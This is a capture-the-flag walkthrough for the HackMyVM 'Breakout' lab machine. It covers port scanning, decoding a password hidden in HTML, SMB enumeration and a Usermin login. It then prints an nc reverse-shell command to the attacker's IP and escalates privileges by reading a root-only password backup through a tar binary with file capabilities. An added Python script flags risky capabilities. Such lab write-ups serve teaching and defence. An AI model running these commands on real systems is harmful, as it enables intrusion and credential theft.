HackMyVm Breakout Walkthrough
Key points: thorough enumeration (SMB users, a hint in HTML source, file capabilities)
https://hackmyvm.eu/machines/machine.php?vm=Breakout
Scan all TCP ports with version detection and default scripts:
```bash
~ nmap -sV -sC -p- -Pn 192.168.33.145 -oN ports.log
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-22 22:02 CST
Nmap scan report for 192.168.33.145
Host is up (0.0022s latency).
Not shown: 65530 closed ports
PORT      STATE SERVICE     VERSION
80/tcp    open  http        Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp   open  netbios-ssn Samba smbd 4.6.2
445/tcp   open  netbios-ssn Samba smbd 4.6.2
10000/tcp open  http        MiniServ 1.981 (Webmin httpd)
|_http-title: 200 &mdash; Document follows
20000/tcp open  http        MiniServ 1.830 (Webmin httpd)
|_http-title: 200 &mdash; Document follows
Host script results:
|_clock-skew: 7h59m58s
|_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-10-22T22:03:10
|_  start_date: N/A
```
Four services: Apache with the default page, Samba, and two MiniServ (Webmin) instances on 10000 and 20000.
Check the source of index.html on port 80. It contains an HTML comment:
```html
<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
-->
```
It is Brainfuck, not encryption. Running it (an online interpreter is enough) prints the string `.2uqPEfj3D<P'a-3`, which looks like a password.
Enumerate SMB with enum4linux to find local usernames:
```bash
~ enum4linux 192.168.33.145 | tee enum.log
...
S-1-22-1-1000 Unix User\cyber (Local User)
```
With the username `cyber` and the password decoded from the Brainfuck comment, we can log in on port 20000. Port 20000 is the default port of Usermin, the per-user companion of Webmin, which accepts ordinary Unix accounts; Webmin on 10000 expects an administrative login.
The control panel includes a command shell module.
Running `nc 192.168.33.128 1234 -e /bin/bash` there (192.168.33.128 is the attacking machine) gives a reverse shell, which we then upgrade to a PTY:
```bash
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.33.145.
Ncat: Connection from 192.168.33.145:35206.
id
uid=1000(cyber) gid=1000(cyber) groups=1000(cyber),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
python3 -c 'import pty;pty.spawn("/bin/bash")'
cyber@breakout:~$
```
Search for binaries with file capabilities:
```bash
cyber@breakout:/$ getcap / -r 2>/dev/null
getcap / -r 2>/dev/null
/home/cyber/tar cap_dac_read_search=ep
/usr/bin/ping cap_net_raw=ep
```
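`cap_net_raw` on ping is normal, but `cap_dac_read_search` on a copy of tar in a user's home directory is the kind of line worth flagging automatically. The script below is an added example, not from the walkthrough: it parses `getcap -r /` output (both the `path cap=flags` and the `path = cap+flags` formats that different libcap versions print), flags capabilities that by themselves lead to root or to reading root-only files, and notes when the capable binary lives under `/home`. `SAMPLE` is constructed for the example, mirroring the two lines from the box plus a harmless multi-capability line and a noise line.

```python
# Added example, not part of the original walkthrough: triage getcap output for
# capabilities that let an unprivileged user read or modify files they should not.
import re

# Capabilities that, on their own, usually end in root or root-owned file access.
DANGEROUS = {
    "cap_dac_read_search": "read any file and traverse any directory (bypasses read permission checks)",
    "cap_dac_override": "bypass read/write/execute permission checks",
    "cap_setuid": "switch to an arbitrary uid, including 0",
    "cap_setgid": "switch to an arbitrary gid",
    "cap_sys_admin": "broad administrative capability (mounts, namespaces, ...)",
    "cap_sys_ptrace": "attach to processes of other users",
    "cap_sys_module": "load kernel modules",
    "cap_chown": "change file ownership",
    "cap_fowner": "bypass file ownership checks",
}

# Matches "/path cap_a,cap_b=ep" (libcap 2.x) and "/path = cap_a+ep" (other versions).
LINE_RE = re.compile(r"^(?P<path>\S+)\s*=?\s*(?P<caps>cap_[\w,]+)[=+](?P<flags>\w+)$")


def parse_getcap(text):
    """Yield (path, set of capability names, flag letters) per getcap line; skip noise."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        yield m.group("path"), set(m.group("caps").split(",")), m.group("flags")


def triage(text):
    """Return a list of findings for binaries carrying a capability in DANGEROUS.

    Each finding records the path, all its caps, the flag letters, whether the
    capability is live on exec ("e" and "p" both set), why it matters, and
    whether the binary sits under /home (a strong hint it was planted for privesc).
    """
    findings = []
    for path, caps, flags in parse_getcap(text):
        risky = sorted(c for c in caps if c in DANGEROUS)
        if not risky:
            continue
        findings.append({
            "path": path,
            "caps": sorted(caps),
            "flags": flags,
            "live": "e" in flags and "p" in flags,
            "why": "; ".join(DANGEROUS[c] for c in risky),
            "in_home": path.startswith("/home/"),
        })
    return findings


# Constructed sample: the two lines from the box, a benign multi-cap line, and a noise line.
SAMPLE = """\
/home/cyber/tar cap_dac_read_search=ep
/usr/bin/ping cap_net_raw=ep
/usr/bin/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
Failed to get capabilities of file '/proc/1/exe' (Operation not supported)
"""

if __name__ == "__main__":
    for f in triage(SAMPLE):
        where = " (under /home!)" if f["in_home"] else ""
        print(f"{f['path']}{where}: {','.join(f['caps'])} [{f['flags']}] -> {f['why']}")
```

Run it against the real output with `getcap -r / 2>/dev/null | python3 triage.py` after replacing `SAMPLE` with `sys.stdin.read()`; the point is that `cap_dac_read_search` on anything that can write out what it reads (tar, cp, cat, a scripting interpreter) is a file-read primitive for root-only files.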
There is also a password backup that only root can read:
```bash
cyber@breakout:/tmp$ ls -la /var/backups
ls -la /var/backups
total 12
drwxr-xr-x  2 root root 4096 Oct 20 07:49 .
drwxr-xr-x 14 root root 4096 Oct 19 13:48 ..
-rw-------  1 root root   17 Oct 20 07:49 .old_pass.bak
```
`cap_dac_read_search` lets a process bypass file read and directory search permission checks, so `/home/cyber/tar` can archive the root-only file even though `cyber` cannot read it directly. Extracting the archive in `/tmp` with the normal tar produces a copy owned by `cyber`:
```bash
cyber@breakout:/tmp$ /home/cyber/tar -cvf pass.tar /var/backups
/home/cyber/tar -cvf pass.tar /var/backups
/home/cyber/tar: Removing leading `/' from member names
/var/backups/
/var/backups/.old_pass.bak
cyber@breakout:/tmp$ tar -xvf pass.tar
tar -xvf pass.tar
var/backups/
var/backups/.old_pass.bak
cyber@breakout:/tmp$ cd var/backups
cd var/backups
cyber@breakout:/tmp/var/backups$ cat .old_pass.bak
cat .old_pass.bak
Ts&4&YurgtRX(=~h
```
Despite the "old" in the file name, that password is still root's, and switching user with it gives us root:
```bash
root@breakout:~# id;hostname
id;hostname
uid=0(root) gid=0(root) groups=0(root)
breakout
```